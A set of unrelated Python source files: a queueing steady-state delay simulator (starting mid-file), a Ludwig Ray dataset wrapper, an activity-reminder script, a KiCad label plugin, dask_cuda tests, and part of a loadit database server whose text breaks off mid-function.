self.printMat("Request rates", self.load)
self.printMat("Server rates", self.mu)
self.printMat("Associations", self.association)
self.printMat("Primary state", self.state)
self.printMat("Probe state", self.statebar)
self.printMat("Possible servers", self.possible_servers)
if printDelay:
self.printMat("Average delays per state (serving)", self.__delta())
self.printMat("Average delays per state (probing)", self.__deltabar())
try:
self.printMat("Steady state state transition matrix", self.transition())
self.printMat("Steady state state probabilities", self.probabilities())
self.printMat("Steady state average delays", self.steady_state_delays())
except DegenerateException:
self.clear()
def I(self, client, server, state):
"Return 1 if the client is served by server in a given state"
if self.state[client, state] == server:
return 1.0
return 0.0
def Ibar(self, client, server, state):
"Return 1 if the client is probing server in a given state"
if self.statebar[client, state] == server:
return 1.0
return 0.0
def __delta(self):
"Compute the average delays when being server"
if self.delta is not None:
return self.delta
self.delta = np.zeros([self.nclients, self.nstates])
for i in range(self.nclients):
for k in range(self.nstates):
server = self.state[i, k]
assert 0 <= server < self.nservers
numerator = self.x[i] * self.mu[server]
denominator = self.mu[server]
denominator -= self.load[i]
for h in range(self.nclients):
if h == i:
continue
denominator -= \
self.load[h] * ( self.I(h, server, k) + self.chi * self.Ibar(h, server, k) )
self.delta[i, k] = self.tau[i, server] + numerator / denominator if denominator > 0 else -1
return self.delta
def __deltabar(self):
"Compute the average delays when probing"
if self.deltabar is not None:
return self.deltabar
self.deltabar = np.zeros([self.nclients, self.nstates])
for i in range(self.nclients):
for k in range(self.nstates):
server = self.statebar[i, k]
assert 0 <= server < self.nservers
numerator = self.x[i] * self.mu[server]
denominator = self.mu[server]
denominator -= self.chi * self.load[i]
for h in range(self.nclients):
if h == i:
continue
denominator -= \
self.load[h] * ( self.I(h, server, k) + self.chi * self.Ibar(h, server, k) )
self.deltabar[i, k] = self.tau[i, server] + numerator / denominator if denominator > 0 else -1
return self.deltabar
def transition(self):
"Compute the transition matrix"
if self.Q is not None:
return self.Q
# make sure the self.delta and self.deltabar variables are initialized
self.__delta()
self.__deltabar()
# create an empty sparse matrix
self.Q = sp.dok_matrix((self.nstates,self.nstates))
# fill the sparse matrix Q with the state transition probabilities
for k in range(self.nstates):
# for every client, the possible servers to which it may go
possible_destinations = []
for i in range(self.nclients):
if self.__remain(i, k):
possible_destinations.append([self.state[i, k]])
else:
possible_destinations.append([self.state[i, k], self.statebar[i, k]])
# identify the list of possible destination states, not including itself
dest_states = []
for h in range(self.nstates):
to_be_added = True
if h == k:
to_be_added = False
else:
for i in range(self.nclients):
#if self.state[i, h] not in possible_destinations[i] or \
# self.delta[i, h] < 0:
if self.state[i, h] not in possible_destinations[i]:
to_be_added = False
break
if to_be_added:
dest_states.append(h)
# if there are no possible destinations, then k is an absorbing state,
# which should not be the case
if len(dest_states) == 0:
#for xxx in range(self.nclients):
# print "{} {} {}".format(
# self.delta[xxx, k],
# self.deltabar[xxx, k],
# possible_destinations[xxx])
raise DegenerateException("Cannot compute transition matrix with absorbing states")
# we assume any state has the same probability to be reached from this
state_prob = 1.0 / len(dest_states)
for h in dest_states:
self.Q[k, h] = state_prob
# the transition matrix has zero-sum per row
self.Q[k, k] = -1.0
return self.Q
#
# copied from the SciPy cookbook
# file: tandemqueue.py
# the method is originally called computePiMethod1()
#
# https://scipy-cookbook.readthedocs.io/items/Solving_Large_Markov_Chains.html
#
def probabilities(self):
"Compute the steady state probabilities"
if self.pi is not None:
return self.pi
# make sure the self.Q variable is initialized
self.transition()
size = self.nstates
l = min(self.Q.values())*1.001 # avoid periodicity, see trivedi's book
P = sp.eye(size, size) - self.Q/l
# compute Pi
P = P.tocsr()
self.pi = np.zeros(size)
pi1 = np.zeros(size)
self.pi[0] = 1;
n = norm(self.pi - pi1, 1)
iterations = 0
while n > 1e-3 and iterations < 1e5:
pi1 = self.pi*P
self.pi = pi1*P # avoid copying pi1 to pi
n = norm(self.pi - pi1, 1)
iterations += 1
return self.pi
def __remain(self, i, k):
"""
Return True if the client i prefers to remain when in state k.
There are different cases depending on whether the queue is stable
in the given primary or secondary state.
Primary unstable: always leave (this is _arbitrary_)
Primary stable:
- if secondary unstable: always remain
- if secondary stable: remain only if delay primary < delay secondary
"""
assert self.delta is not None
assert self.deltabar is not None
if self.delta[i, k] < 0:
return False # leave
if self.deltabar[i, k] < 0:
return True # remain
if self.deltabar[i, k] < self.delta[i, k]:
return False # leave
return True # remain
def absorbing(self):
"Return the list of absorbing states (may be empty)"
if self.delta is None:
self.__delta()
if self.deltabar is None:
self.__deltabar();
ret = []
for k in range(self.nstates):
serving_faster = True
for i in range(self.nclients):
serving_faster &= self.__remain(i, k)
if serving_faster:
ret.append(k)
return ret
def steady_state_delays(self):
"Return the average delay per client"
if self.delays is not None:
return self.delays
# make sure the delta and state probabilities are initialized
self.__delta()
try:
self.probabilities()
self.delays = np.matmul(self.delta, self.pi)
except DegenerateException:
absorbing_states = self.absorbing()
assert len(absorbing_states) > 0
if len(absorbing_states) > 1:
# not sure if this may ever happen
print "> 1 absorbing state: {}".format(absorbing_states)
else:
print "found an absorbing state"
self.delays = np.zeros([self.nclients])
for i in range(self.nclients):
self.delays[i] = self.delta[i, absorbing_states[0]]
return self.delays
################################################################################
################################################################################
################################################################################
class SteadyStateSingle(SteadyStateGeneric):
"""Steady-state delays of a serverless edge computing with a single option"""
def __init__(self,
configuration,
verbose = False):
super(SteadyStateSingle, self).__init__(verbose)
# input
self.tau = configuration.tau
self.x = configuration.x
self.load = configuration.load
self.mu = configuration.mu
self.association = configuration.association
#
# derived variables
#
# lazy initialization variables
self.delays = None
# scalars
self.nclients = self.tau.shape[0]
self.nservers = self.tau.shape[1]
self.nstates = pow(2, self.nclients)
# possible server for each client
self.servers = np.zeros(self.nclients, dtype=int)
for i in range(self.nclients):
server_list = []
for (ndx,s) in zip(range(self.nservers),self.association[i]):
if s == 1:
server_list.append(ndx)
assert len(server_list) == 1
self.servers[i] = server_list[0]
# further size checks
assert self.x.shape[0] == self.nclients
assert self.load.shape[0] == self.nclients
assert self.mu.shape[0] == self.nservers
assert self.association.shape[0] == self.nclients
assert self.association.shape[1] == self.nservers
def clear(self):
"Remove all derived data structures"
self.delays = None
def debugPrint(self, printDelay = False):
"Print the internal data structures"
self.printMat("Network delays", self.tau)
self.printMat("Requests", self.x)
self.printMat("Request rates", self.load)
self.printMat("Server rates", self.mu)
self.printMat("Associations", self.association)
self.printMat("Possible servers", self.servers)
if printDelay:
self.printMat("Steady state average delays", self.steady_state_delays())
def steady_state_delays(self):
"Return the average delay per client"
if self.delays is not None:
return self.delays
self.delays = np.zeros([self.nclients])
# compute the total load per every server
loads = np.zeros(self.nservers)
for i,j in zip(range(self.nclients), self.servers):
loads[j] += self.load[i]
# compute average delay, use -1 if server is unstable
for i in range(self.nclients):
server = self.servers[i]
if self.mu[server] <= loads[server]:
self.delays[i] = -1.0
else:
queueing_delay = \
( self.x[i] * self.mu[server] ) / \
( self.mu[server] - loads[server] )
self.delays[i] = self.tau[i, j] + queueing_delay \
return self.delays
################################################################################
################################################################################
################################################################################
class Simulator(object):
"Run simulations using a pool of threads"
def __init__(self, single = False, nthreads = 1, verbose = False, progress = False):
"Initialize object"
# consistency checks
assert nthreads >= 1
# input
self.single = single
self.nthreads = nthreads
self.verbose = verbose
self.progress = progress
# internal data structures
self.lock = threading.Lock()
self.done = []
self.average_delays = []
def run(self, configurations):
"Run the simulations in the given list of Configuration objects"
self.configurations = configurations
self.done = [False for i in range(len(configurations))]
self.average_delays = [None for i in range(len(configurations))]
# spawn threads
threads = []
for i in range(min(self.nthreads,len(configurations))):
t = threading.Thread(target = self.__work, args=[i])
threads.append(t)
t.start()
# wait for the threads to terminate
for t in threads:
t.join()
def __work(self, tid):
"Execute a single simulation"
while True:
# find the next job, if none leave
job = None
with self.lock:
for done, ndx in zip(self.done, range(len(self.done))):
if not done:
self.done[ndx] = True
job = ndx
break
if job is None:
break
if self.single:
ss = SteadyStateSingle(self.configurations[job], self.verbose)
else:
ss = SteadyState(self.configurations[job], self.verbose)
if self.verbose:
with self.lock:
ss.debugPrint(True)
try:
now = time.time()
average_delays = ss.steady_state_delays()
with self.lock:
if self.progress:
print "thread#{}, job {}/{}, required {} s".format(tid, ndx, len(self.done), time.time() - now)
self.average_delays[job] = average_delays
except DegenerateException:
print "skipped run#{}, absorbing states: {}".format(job, ', '.join([str(y) for y in ss.absorbing()]))
|
ray.py
|
#! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import contextlib
import math
import queue
import threading
from distutils.version import LooseVersion
from functools import lru_cache
from typing import Dict, Any, Iterator
import numpy as np
import pandas as pd
import ray
from ray.data import from_dask, read_parquet
from ray.data.dataset_pipeline import DatasetPipeline
from ray.data.extensions import TensorDtype
from ludwig.constants import NAME
from ludwig.data.batcher.base import Batcher
from ludwig.data.dataset.base import Dataset, DatasetManager
from ludwig.utils.data_utils import DATA_TRAIN_HDF5_FP
from ludwig.utils.misc_utils import get_proc_features
from ludwig.utils.types import DataFrame
_ray18 = LooseVersion(ray.__version__) >= LooseVersion("1.8")
class RayDataset(Dataset):
""" Wrapper around ray.data.Dataset. """
def __init__(self, df: DataFrame, features: Dict[str, Dict], training_set_metadata: Dict[str, Any]):
self.ds = from_dask(df) if not isinstance(df, str) else read_parquet(df)
self.features = features
self.training_set_metadata = training_set_metadata
self.data_hdf5_fp = training_set_metadata.get(DATA_TRAIN_HDF5_FP)
# TODO ray 1.8: convert to Tensors before shuffle
# def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
# for c in features.keys():
# df[c] = df[c].astype(TensorDtype())
# return df
# self.ds = self.ds.map_batches(to_tensors, batch_format="pandas")
def pipeline(self, shuffle=True) -> DatasetPipeline:
pipe = self.ds.repeat()
if shuffle:
if _ray18:
pipe = pipe.random_shuffle_each_window()
else:
pipe = pipe.random_shuffle()
return pipe
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128,
should_shuffle=True,
seed=0,
ignore_last=False,
horovod=None):
yield RayDatasetBatcher(
self.ds.repeat().iter_datasets(),
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
def __len__(self):
return self.ds.count()
@property
def size(self):
return len(self)
class RayDatasetManager(DatasetManager):
def __init__(self, backend):
self.backend = backend
def create(self, dataset: DataFrame, config: Dict[str, Any], training_set_metadata: Dict[str, Any]):
return RayDataset(
dataset,
get_proc_features(config),
training_set_metadata
)
def save(
self,
cache_path: str,
dataset: DataFrame,
config: Dict[str, Any],
training_set_metadata: Dict[str, Any],
tag: str
):
self.backend.df_engine.to_parquet(dataset, cache_path)
return cache_path
def can_cache(self, skip_save_processed_input):
return not skip_save_processed_input
@property
def data_format(self):
return 'parquet'
class RayDatasetShard(Dataset):
def __init__(
self,
dataset_shard: DatasetPipeline,
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
):
self.dataset_shard = dataset_shard
self.features = features
self.training_set_metadata = training_set_metadata
self.dataset_iter = dataset_shard.iter_datasets()
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128,
should_shuffle=True,
seed=0,
ignore_last=False,
horovod=None):
yield RayDatasetBatcher(
self.dataset_iter,
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
@lru_cache(1)
def __len__(self):
# TODO(travis): find way to avoid calling this, as it's expensive
return next(self.dataset_iter).count()
@property
def size(self):
return len(self)
class RayDatasetBatcher(Batcher):
def __init__(
self,
dataset_epoch_iterator: Iterator[ray.data.Dataset],
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
batch_size: int,
samples_per_epoch: int,
):
self.dataset_epoch_iterator = dataset_epoch_iterator
self.batch_size = batch_size
self.samples_per_epoch = samples_per_epoch
self.training_set_metadata = training_set_metadata
self.columns = list(features.keys())
self.reshape_map = {
proc_column: training_set_metadata[feature[NAME]].get('reshape')
for proc_column, feature in features.items()
}
self.dataset_batch_iter = None
self._epoch = 0
self._next_batch = None
self._last_batch = False
self._step = 0
self._fetch_next_epoch()
def next_batch(self):
if self.last_batch():
raise StopIteration()
batch = self._next_batch
self._fetch_next_batch()
self._step += 1
return batch
def last_batch(self):
return self._last_batch
def set_epoch(self, epoch, batch_size):
self.batch_size = batch_size
if epoch != self._epoch:
self._fetch_next_epoch()
self._epoch = epoch
@property
def step(self):
return self._step
@property
def steps_per_epoch(self):
return math.ceil(self.samples_per_epoch / self.batch_size)
def _fetch_next_epoch(self):
dataset = next(self.dataset_epoch_iterator)
read_parallelism = 1
if read_parallelism == 1:
self.dataset_batch_iter = self._create_async_reader(dataset)
elif read_parallelism > 1:
self.dataset_batch_iter = self._create_async_parallel_reader(dataset, read_parallelism)
else:
# TODO: consider removing this. doesn't work currently and read performance seems generally
# very good with 1 parallelism
self.dataset_batch_iter = self._create_sync_reader(dataset)
self._step = 0
self._fetch_next_batch()
def _fetch_next_batch(self):
if self.dataset_batch_iter is None:
self._last_batch = True
return
self._last_batch = False
try:
self._next_batch = next(self.dataset_batch_iter)
except StopIteration:
self._last_batch = True
def _to_tensors_fn(self):
columns = self.columns
def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
for c in columns:
df[c] = df[c].astype(TensorDtype())
return df
return to_tensors
def _prepare_batch(self, batch: pd.DataFrame) -> Dict[str, np.ndarray]:
res = {
c: batch[c].to_numpy() for c in self.columns
}
for c in self.columns:
reshape = self.reshape_map.get(c)
if reshape is not None:
res[c] = res[c].reshape((-1, *reshape))
return res
def _create_sync_reader(self, dataset: ray.data.Dataset):
to_tensors = self._to_tensors_fn()
def sync_read():
for batch in dataset.map_batches(
to_tensors, batch_format="pandas"
).iter_batches(
prefetch_blocks=0,
batch_size=self.batch_size,
batch_format="pandas"
):
yield self._prepare_batch(batch)
return sync_read()
def _create_async_reader(self, dataset: ray.data.Dataset):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
def producer():
for batch in dataset.map_batches(
to_tensors,
batch_format="pandas"
).iter_batches(
prefetch_blocks=0,
batch_size=batch_size,
batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_read():
t = threading.Thread(target=producer)
t.start()
while True:
batch = q.get(block=True)
if batch is None:
break
yield batch
t.join()
return async_read()
def _create_async_parallel_reader(self, dataset: ray.data.Dataset, num_threads: int):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
splits = dataset.split(n=num_threads)
def producer(i):
for batch in splits[i].map_batches(
to_tensors,
batch_format="pandas"
).iter_batches(
prefetch_blocks=0,
batch_size=batch_size,
batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_parallel_read():
threads = [threading.Thread(target=producer, args=(i,)) for i in range(num_threads)]
for t in threads:
t.start()
active_threads = num_threads
while True:
batch = q.get(block=True)
if batch is None:
active_threads -= 1
if active_threads == 0:
break
yield batch
for t in threads:
t.join()
return async_parallel_read()
|
main.py
|
try:
from os.path import abspath, dirname
import json
import time
import threading
import multiprocessing
import sys
from pushover import init, Client
import platform
except:
print("Please type this: pip3 install python-pushover, colorama")
sys.exit()
#My modules
from activity import Activity
#Check for amount of cores
cpu_count = multiprocessing.cpu_count()
if cpu_count < 2:
print("Sorry. This cannot run with less than 2 cores.")
sys.exit()
else:
user_os = platform.system()
if user_os == "Windows":
path = "\\"
else:
path = "/"
#Open the config json file
script = dirname(abspath(__file__))
with open(f'{script}{path}config.json') as f:
config = json.load(f)
#This stores name and stuff
with open(f'{script}{path}name.json') as f:
settings = json.load(f)
#get config stuffs for pushover
user = config.get("user_key")
api = config.get("api_key")
#Start the Pushover client
client = Client(user, api_token=api)
#Start activity class
activity = Activity()
if settings["name"] is None:
activity.get_name()
activity.greeting()
checking = threading.Thread(target=activity.check_for_act)
checking.start()
#As a wise man once said; LETS GO!
while True:
user_input = input(">")
if user_input == "help" or user_input == "h" or user_input == "man" or user_input == "?":
activity.help()
elif user_input == "change_name":
activity.get_name()
elif user_input == "add_activity":
activity.add_activity()
elif user_input == "delete_all":
activity.delete_all()
elif user_input == "list_all":
activity.list_all()
elif user_input == "delete_one":
activity.delete_one()
elif user_input == "time" or user_input == "get_time":
activity.get_time()
elif user_input == "set_color":
activity.set_color()
elif user_input == "clear_on_start":
activity.clear_on_start()
elif user_input == "set_back":
activity.set_back()
elif user_input == "set_style":
activity.set_style()
elif user_input == "exit" or user_input == "quit":
print("Exiting. Please be aware that activities will not be notified while this is not running.")
print("idk how to stop threads")
sys.exit()
else:
print("Unknown command. Do help to learn more.")
|
__init__.py
|
import os
import sys
import subprocess
import threading
import time
import wx
import wx.aui
from wx import FileConfig
import pcbnew
from .dialog import Dialog
def check_for_bom_button():
# From Miles McCoo's blog
# https://kicad.mmccoo.com/2017/03/05/adding-your-own-command-buttons-to-the-pcbnew-gui/
def find_pcbnew_window():
windows = wx.GetTopLevelWindows()
pcbneww = [w for w in windows if "pcbnew" in w.GetTitle().lower()]
if len(pcbneww) != 1:
return None
return pcbneww[0]
def callback(_):
plugin.Run()
path = os.path.dirname(__file__)
while not wx.GetApp():
time.sleep(1)
bm = wx.Bitmap(path + '/icon.png', wx.BITMAP_TYPE_PNG)
button_wx_item_id = 0
from pcbnew import ID_H_TOOLBAR
while True:
time.sleep(1)
pcbnew_window = find_pcbnew_window()
if not pcbnew_window:
continue
top_tb = pcbnew_window.FindWindowById(ID_H_TOOLBAR)
if button_wx_item_id == 0 or not top_tb.FindTool(button_wx_item_id):
top_tb.AddSeparator()
button_wx_item_id = wx.NewId()
top_tb.AddTool(button_wx_item_id, "KiBuzzard", bm,
"Execute Buzzard script", wx.ITEM_NORMAL)
top_tb.Bind(wx.EVT_TOOL, callback, id=button_wx_item_id)
top_tb.Realize()
class KiBuzzardPlugin(pcbnew.ActionPlugin, object):
config_file = os.path.join(os.path.dirname(__file__), '..', 'config.ini')
buzzard_path = os.path.join(os.path.dirname(__file__), '..', 'deps', 'buzzard')
def __init__(self):
super(KiBuzzardPlugin, self).__init__()
self.name = "Create Labels"
self.category = "Modify PCB"
self.pcbnew_icon_support = hasattr(self, "show_toolbar_button")
self.show_toolbar_button = True
icon_dir = os.path.dirname(os.path.dirname(__file__))
self.icon_file_name = os.path.join(icon_dir, 'icon.png')
self.description = "Create Labels"
self.config = FileConfig(localFilename=self.config_file)
self._pcbnew_frame = None
def defaults(self):
pass
def Run(self):
buzzard_script = os.path.join(self.buzzard_path, 'buzzard.py')
if self._pcbnew_frame is None:
self._pcbnew_frame = [x for x in wx.GetTopLevelWindows() if 'pcbnew' in x.GetTitle().lower() and not 'python' in x.GetTitle().lower()][0]
def run_buzzard(str):
import re
str = str + ' -o ki -stdout'
args = [a.strip('"') for a in re.findall('".+?"|\S+', str)]
# Execute Buzzard
process = None
if sys.platform.startswith('linux'):
process = subprocess.Popen(['python', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
process = subprocess.Popen(['python3.exe', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = process.communicate()
if stderr:
wx.MessageBox(stderr, 'Error', wx.OK | wx.ICON_ERROR)
# check for errors
error_line = [s for s in stderr.decode('utf8').split('\n') if 'error' in s]
if len(error_line) > 0:
wx.MessageBox(error_line[0], 'Error', wx.OK | wx.ICON_ERROR)
else:
# Copy footprint into clipboard
if sys.platform.startswith('linux'):
clip_args = ['xclip', '-sel', 'clip', '-noutf8']
else:
clip_args = ['clip.exe']
process = subprocess.Popen(clip_args, stdin=subprocess.PIPE)
process.communicate(stdout)
dlg.EndModal(wx.ID_OK)
dlg = Dialog(self._pcbnew_frame, self.config, self.buzzard_path, run_buzzard)
try:
if dlg.ShowModal() == wx.ID_OK:
# Set focus to main window and execute a Paste operation
self._pcbnew_frame.Raise()
wx.Yield()
keyinput = wx.UIActionSimulator()
keyinput.Char(ord("V"), wx.MOD_CONTROL)
finally:
self.config.Flush()
dlg.Destroy()
plugin = KiBuzzardPlugin()
plugin.register()
# Add a button the hacky way if plugin button is not supported
# in pcbnew, unless this is linux.
if not plugin.pcbnew_icon_support and not sys.platform.startswith('linux'):
t = threading.Thread(target=check_for_bom_button)
t.daemon = True
t.start()
|
test_explicit_comms.py
|
import multiprocessing as mp
import pytest
from distributed import Client
from distributed.deploy.local import LocalCluster
from dask_cuda.explicit_comms import CommsContext, dataframe_merge
import pandas as pd
import dask.dataframe as dd
import numpy as np
import pytest
import cudf
import cupy
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Notice, all of the following tests is executed in a new process such
# that UCX options of the different tests doesn't conflict.
async def my_rank(state):
return state["rank"]
def _test_local_cluster(protocol):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=4,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
comms = CommsContext(client)
assert sum(comms.run(my_rank)) == sum(range(4))
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_local_cluster(protocol):
p = mp.Process(target=_test_local_cluster, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge(backend, protocol, n_workers):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
comms = CommsContext(client)
nrows = n_workers * 10
# Let's make some dataframes that we can join on the "key" column
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame(
{"key": key[nrows // 3 :], "payload2": np.arange(nrows)[nrows // 3 :]}
)
expected = df1.merge(df2).set_index("key")
if backend == "cudf":
df1 = cudf.DataFrame.from_pandas(df1)
df2 = cudf.DataFrame.from_pandas(df2)
ddf1 = dd.from_pandas(df1, npartitions=n_workers + 1)
ddf2 = dd.from_pandas(
df2, npartitions=n_workers - 1 if n_workers > 1 else 1
)
ddf3 = dataframe_merge(ddf1, ddf2, on="key").set_index("key")
got = ddf3.compute()
if backend == "cudf":
got = got.to_pandas()
got.index.names = ["key"] # TODO: this shouldn't be needed
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_merge(backend, protocol, nworkers):
p = mp.Process(target=_test_dataframe_merge, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
|
server.py
|
import jwt
import getpass
import os
import time
import shutil
from pathlib import Path
import json
import logging
import traceback
import socketserver
import ssl
import secrets
import threading
import pyarrow as pa
from multiprocessing import Process, cpu_count, Event, Manager, Lock
from loadit.resource_lock import ResourceLock
from loadit.database import Database, create_database, parse_query
from loadit.sessions import Sessions
from loadit.connection import Connection
from loadit.connection_tools import recv_tables, get_ip, find_free_port
from loadit.misc import humansize, get_hasher, hash_bytestr
import loadit.log as log
SERVER_PORT = 8080
class CentralQueryHandler(socketserver.BaseRequestHandler):
def handle(self):
connection = self.server.connection
query = connection.recv()
self.server.authorize(query)
request_type = query['request_type']
log_request = True
# WORKER REQUESTS
if request_type == 'add_worker':
self.server.add_worker(tuple(query['worker_address']), query['databases'], query['backup'])
elif request_type == 'remove_worker':
self.server.remove_worker(tuple(query['worker_address']))
elif request_type == 'acquire_worker':
connection.send({'worker_address': self.server.acquire_worker(node=query['node'])})
elif request_type == 'release_worker':
if 'databases' in query:
self.server.nodes[query['worker_address'][0]].databases = query['databases']
if query['worker_address'][0] == self.server.server_address[0]:
self.server.databases = query['databases']
self.server.release_worker(tuple(query['worker_address']))
elif request_type == 'list_databases':
connection.send(self.server.databases)
# CLIENT REQUESTS
elif request_type == 'authentication':
connection.send({'msg': 'Logged in'})
elif request_type == 'shutdown':
if query['node']:
self.server.shutdown_node(query['node'])
connection.send({'msg': 'Node shutdown'})
else:
threading.Thread(target=self.server.shutdown).start()
connection.send({'msg': 'Cluster shutdown'})
elif request_type == 'cluster_info':
connection.send(self.server.info().encode())
elif request_type == 'add_session':
self.server.sessions.add_session(query['user'], session_hash=query['session_hash'],
is_admin=query['is_admin'],
create_allowed=query['create_allowed'],
databases=query['databases'])
connection.send({'msg': "User '{}' added".format(query['user'])})
elif request_type == 'remove_session':
self.server.sessions.remove_session(query['user'])
connection.send({'msg': "User '{}' removed".format(query['user'])})
elif request_type == 'list_sessions':
connection.send({'sessions': list(self.server.sessions.sessions.values())})
elif request_type == 'sync_databases':
self.server.sync_databases(query['nodes'], query['databases'], connection)
else: # REDIRECTED REQUESTS
log_request = False
if request_type != 'create_database' and query['path'] not in self.server.databases:
raise ValueError("Database '{}' not available!".format(query['path']))
if request_type in ('create_database', 'new_batch',
'restore_database', 'remove_database',
'add_attachment', 'remove_attachment'):
node = self.server.server_address[0]
else:
node = None
connection.send({'redirection_address': self.server.acquire_worker(node=node, database=query['path'])})
if log_request:
log_msg = "ip: {}, user: {}, request: {}, database: {}, in: {}, out: {}"
if request_type == 'release_worker':
if not query['is_error']:
self.server.log.info(log_msg.format(query['client_address'],
query['user'],
query['request'],
query['database'],
humansize(query['nbytes_in']),
humansize(query['nbytes_out'])))
else:
self.server.log.info(log_msg.format(self.request.getpeername()[0],
self.server.current_session['user'],
request_type,
None,
humansize(connection.nbytes_in),
humansize(connection.nbytes_out)))
class WorkerQueryHandler(socketserver.BaseRequestHandler):
def handle(self):
connection = self.server.connection
self.server.log_handler = log.ConnectionHandler(connection)
self.server.log_handler.setLevel(logging.INFO)
self.server.log_handler.setFormatter(logging.Formatter('%(message)s'))
self.server.log.addHandler(self.server.log_handler)
query = connection.recv()
self.server.authorize(query)
request_type = query['request_type']
if request_type == 'shutdown':
self.server._shutdown_request = True
threading.Thread(target=self.server.shutdown).start()
elif request_type == 'list_databases':
connection.send(self.server.databases._getvalue())
elif request_type == 'sync_databases':
self.server.sync_databases(query['nodes'], query['databases'], connection)
elif request_type == 'recv_databases':
self.server.recv_databases(connection)
elif request_type == 'remove_database':
self.server.current_database = query['path']
with self.server.database_lock.acquire(query['path']):
shutil.rmtree(os.path.join(self.server.root_path, query['path']))
connection.send({'msg': "Database '{}' removed".format(query['path'])})
del self.server.databases[query['path']]
else:
self.server.current_database = query['path']
with self.server.database_lock.acquire(query['path'],
block=(request_type in ('create_database',
'new_batch',
'restore_database',
'add_attachment',
'remove_attachment'))):
path = os.path.join(self.server.root_path, query['path'])
if request_type == 'create_database':
if query['path'] in self.server.databases.keys():
raise FileExistsError(f"Database already exists at '{query['path']}'!")
db = create_database(path)
else:
db = Database(path)
if request_type == 'check':
connection.send({'corrupted_files': db.check(), 'header': None})
return
elif request_type == 'query':
batch = db.query(**parse_query(query))
elif request_type == 'new_batch':
connection.send(db._get_tables_specs())
db.new_batch(query['files'], query['batch'], query['comment'], table_generator=recv_tables(connection))
elif request_type == 'restore_database':
db.restore(query['batch'])
elif request_type == 'add_attachment':
if query['file'] in db.header.attachments:
raise FileExistsError(f"Already existing attachment!")
attachment_file = os.path.join(path, '.attachments', os.path.basename(query['file']))
connection.send(b'proceed')
connection.recv_file(attachment_file)
db.add_attachment(attachment_file, copy=False)
elif request_type == 'remove_attachment':
db.remove_attachment(query['name'])
elif request_type == 'download_attachment':
if query['name'] not in db.header.attachments:
raise FileNotFoundError(f"Attachment not found!")
attachment_file = os.path.join(path, '.attachments', query['name'])
connection.send({'msg': f"Downloading '{query['name']}' ({humansize(os.path.getsize(attachment_file))})..."})
connection.send_file(attachment_file)
self.server.log.info(f"Attachment '{query['name']}' downloaded")
if self.server.current_session['database_modified']:
self.server.databases[query['path']] = get_database_hash(os.path.join(path, '##header.json'))
if request_type in ('header', 'create_database',
'new_batch', 'restore_database',
'add_attachment', 'remove_attachment'):
header = db.header.__dict__
else:
header = None
db = None
try:
batch_message = get_batch_message(batch)
connection.send({'msg': f"Transferring query results ({humansize(len(batch_message))})...", 'header': header})
connection.send(batch_message, 'buffer')
except NameError:
connection.send({'header': header})
class DatabaseServer(socketserver.TCPServer):
allow_reuse_address = True
request_queue_size = 5
def __init__(self, server_address, query_handler, root_path, certfile, debug=False):
self.context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.context.load_cert_chain(certfile)
super().__init__(server_address, query_handler)
self.root_path = root_path
self.databases = None
self.master_key = None
self.current_session = None
self._debug = debug
self._done = Event()
def wait(self):
self._done.wait()
self._done.clear()
def server_activate(self):
super().server_activate()
self.socket = self.context.wrap_socket(self.socket, server_side=True)
def serve_forever(self, *args, **kwargs):
try:
super().serve_forever(*args, **kwargs)
finally:
self.master_key = None
def handle_error(self, request, client_address):
self.current_session['is_error'] = True
try:
self.connection.send(traceback.format_exc(), 'exception')
except BrokenPipeError:
pass
def refresh_databases(self):
self.databases = get_local_databases(self.root_path)
def verify_request(self, request, client_address):
error_msg = 'Access denied!'
try:
self.connection = Connection(socket=request)
data = self.connection.recv()
if type(data) is dict:
if 'password' in data: # User login
try:
self.current_session = self.sessions.get_session(data['user'], data['password'])
except KeyError:
error_msg = 'Wrong username or password!'
raise PermissionError()
from loadit.__init__ import __version__
if data['version'].split('.')[-1] != __version__.split('.')[-1]:
error_msg = f"Not supported version! Update to version: '{__version__}'"
raise PermissionError()
if data['request'] == 'master_key':
if not self.current_session['is_admin']:
error_msg = 'Not enough privileges!'
raise PermissionError()
self.connection.send(self.master_key)
else:
authentication = jwt.encode(self.current_session, self.master_key)
